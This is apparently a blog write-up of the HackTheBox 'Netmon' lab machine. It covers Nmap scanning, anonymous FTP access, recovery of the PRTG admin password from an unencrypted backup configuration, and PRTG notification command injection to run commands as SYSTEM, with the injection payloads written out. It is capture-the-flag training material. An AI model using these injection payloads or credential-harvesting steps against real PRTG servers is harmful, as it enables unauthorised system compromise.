This is the second machine i have completed on HackTheBox. I started with the Access machine. The write-up for that can be found HERE.
So the first step to the perform an Nmap scan to see what kind of services the machine is running:
nmap -p- -sV -O 10.10.10.152 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 10:55 UTC Nmap scan report for ip-10-10-10-152.eu-west-2.compute.internal (10.10.10.152) Host is up (0.016s latency). Not shown: 65521 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Indy httpd 22.214.171.12446 (Paessler PRTG bandwidth monitor) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC 49681/tcp open msrpc Microsoft Windows RPC 49691/tcp open msrpc Microsoft Windows RPC 51061/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 108.04 seconds
What sticks out the most in the results of this scan is HTTP on port 80 and FTP on port 21. I first browsed to port 80 and was greeted with a login page for Paessler PRTG. This is software used to monitor devices and report their statuses (downtime, CPU usage, disk space usage and things like that).
I did a quick google to find the default credentials for PRTG (prtgadmin:prtgadmin). But unfortunately the credentials didn’t work. For the time being this is as far as i can get on PRTG. I decided to turn my attention to the FTP port.
I connected to FTP and found that it accepts anonymous connections.
ncftp 10.10.10.152 NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/). Connecting to 10.10.10.152… Microsoft FTP Service Logging in… User logged in. Logged in to 10.10.10.152. ncftp / > dir -A 11-20-16 10:46PM $RECYCLE.BIN 02-03-19 12:18AM 1024 .rnd 11-20-16 09:59PM 389408 bootmgr 07-16-16 09:10AM 1 BOOTNXT 02-03-19 08:05AM Documents and Settings 02-25-19 10:15PM inetpub 04-24-19 06:49AM 738197504 pagefile.sys 07-16-16 09:18AM PerfLogs 02-25-19 10:56PM Program Files 02-03-19 12:28AM Program Files (x86) 02-25-19 10:56PM ProgramData 02-03-19 08:05AM Recovery 02-03-19 08:04AM System Volume Information 02-03-19 08:08AM Users 02-25-19 11:49PM Windows
I browsed to the the public folder to see if i had access to the user flag.
ncftp / > cd Users/Public/ ncftp /Users/Public > cat user.txt [REDACTED]
This was probably one of the most easiest user flags i have found. I tried to do the same with the root flag but diddnt have as much luck.
ncftp / > cd Users/Administrator/ Could not chdir to Users/Administrator/: server said: Access is denied.
I decided to try and find some credentials for PRTG so I can login to the web frontend. There was a vulnerability in an older version of PRTG where device credentials that PRTG request to run its sensor software was stored in the PRTG confirguration file without any form of encryption. I went on a hunt to try and find this configuration file. Through FTP I navigated to the location where the configuration file is normally stored.
ncftp / > cd "/ProgramData/Paessler/PRTG Network Monitor" ncftp ...r/PRTG Network Monitor > dir -A 04-24-19 06:53AM <DIR> Configuration Auto-Backups 04-24-19 06:51AM <DIR> Log Database 02-03-19 12:18AM <DIR> Logs (Debug) 02-03-19 12:18AM <DIR> Logs (Sensors) 02-03-19 12:18AM <DIR> Logs (System) 04-24-19 06:51AM <DIR> Logs (Web Server) 04-24-19 06:56AM <DIR> Monitoring Database 04-24-19 07:15AM 1255809 PRTG Configuration.dat 04-24-19 06:53AM 1197689 PRTG Configuration.old 07-14-18 03:13AM 1153755 PRTG Configuration.old.bak 04-24-19 06:52AM 1647609 PRTG Graph Data Cache.dat 02-25-19 11:00PM <DIR> Report PDFs 02-03-19 12:18AM <DIR> System Information Database 02-03-19 12:40AM <DIR> Ticket Database 02-03-19 12:18AM <DIR> ToDo Database ncftp ...r/PRTG Network Monitor >
As you can see from the output. There are 3 PRTG configuration files. I downloaded them all and inspected each one individually to see if there was any credentials stored in them.
Two of the files had encrypted credentials stored so were no much use. However PRTG Configuration.old.bak wasn’t encrypted and included the password for the web interface.
<dbcredentials> 0 </dbcredentials> <dbpassword> <!-- User: prtgadmin --> PrTg@dmin2018 </dbpassword> <dbtimeout> 60 </dbtimeout>
I tired logging in with these credentials but it would not work. After some trial and error i found that simply amending the password to be PrTg@dmin2019 instead of 2018 allowed me to login. The next step was to try and escalate my privileges to allow me to access the Administrator directory and get the root flag.
I did some searching on Google and found that the version of PRTG being used on the machine is vulnerable to a command injection vulnerability. A more detailed description of this can be found HERE.
The way this works. PRTG essentially monitors the status of different devices. Once a certain state has been reached it can be configured to perform a variety of tasks including send an email, send SMS, execute a script and so on. It may be used for example to send a warning message to the Administrator email address when a server goes down so the Administrator can investigate. The command injection vulnerability works through the execution of a script notification. Once a device has reached a specific state, PRTG can be configured to run a script.
The scripts cant be added through the web interface. they need to be uploaded to the server to the C:/Program Files (x86)/PRTG Network Monitor/Custom Sensors/EXE/directory. They can then be selected as a custom notification through the PRTG web interface.
I attempted to upload a reverse powershell script to this directory through FTP but unfortunatly i diddnt have the required privilages.
ncftp ...tor/Custom Sensors/EXE > put rev.ps1 put rev.ps1: server said: Access is denied.
The command injection vulnerability discovered in the link above found that there are two default scripts already stored in this directory. You have the ability in the PRTG web interface to include parameters for the script to run. These parameters aren’t sanitised at all and are passed directly into powershell. As PRTG runs under the system account any command passed as a parameter will run as System. I decided to give this a test by inputting the following command in the parameter input:
test.txt;tree /f c:\Users\Administrator > c:\output.txt
I saved this notification template and then needed to add it to a device so that it runs. I opened the DNS ping sensor as this was always failing.
The notification was added to the sensor and configured to run after 60 seconds of the device being down. As the sensor was always down, this meant that the notification would be run straight away. Once i save the notification to the sensor i browsed via FTP to the root of the C: to see if my file was present and the code successfully run.
ncftp 10.10.10.152 NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/). Connecting to 10.10.10.152... Microsoft FTP Service Logging in... User logged in. Logged in to 10.10.10.152. ncftp / > dir -A 11-20-16 10:46PM <DIR> $RECYCLE.BIN 02-03-19 12:18AM 1024 .rnd 11-20-16 09:59PM 389408 bootmgr 07-16-16 09:10AM 1 BOOTNXT 02-03-19 08:05AM <DIR> Documents and Settings 02-25-19 10:15PM <DIR> inetpub 04-24-19 12:58PM 1402 output.txt 04-24-19 07:24AM 738197504 pagefile.sys 07-16-16 09:18AM <DIR> PerfLogs 02-25-19 10:56PM <DIR> Program Files 02-03-19 12:28AM <DIR> Program Files (x86) 02-25-19 10:56PM <DIR> ProgramData 02-03-19 08:05AM <DIR> Recovery 02-03-19 08:04AM <DIR> System Volume Information 02-03-19 08:08AM <DIR> Users 02-25-19 11:49PM <DIR> Windows ncftp / >
As you an see the code looks like it run successfully. There is a file called output.txt and when i download and view it is successfully display the directory structure for the Administrator folder.
cat output.txt Folder PATH listing Volume serial number is 00000200 684B:9CE8 C:\USERS\ADMINISTRATOR ├───Contacts ├───Desktop │ root.txt │ ├───Documents ├───Downloads ├───Favorites ├───Links ├───Music ├───Pictures ├───Saved Games ├───Searches └───Videos
From this output we can see the exact location of the root.txt flag that we need. Knowing we can now run code as the System user. I create the last PRTG notification to get the contents of root.txt and copy it to the root directory so that i can read it. I do this by changing the parameter field so instead of running the tree command, it runs the command “more root.txt” and pipes the output to the root directory. The full command is:
test.txt;more c:\Users\Administrator\Desktop\root.txt > c:\output.txt
I repeat the steps described with the new command and wait for the output.txt file to be updated. Once updated i download the new output.txt file and view the contents.
root@kali:~/Documents/netmon# cat output.txt [REDACTED]
This was a great machine to work on. Defiantly much more of a challenge than the first Access machine I attempted. If you have any questions or comments please leave them below, or email me directly.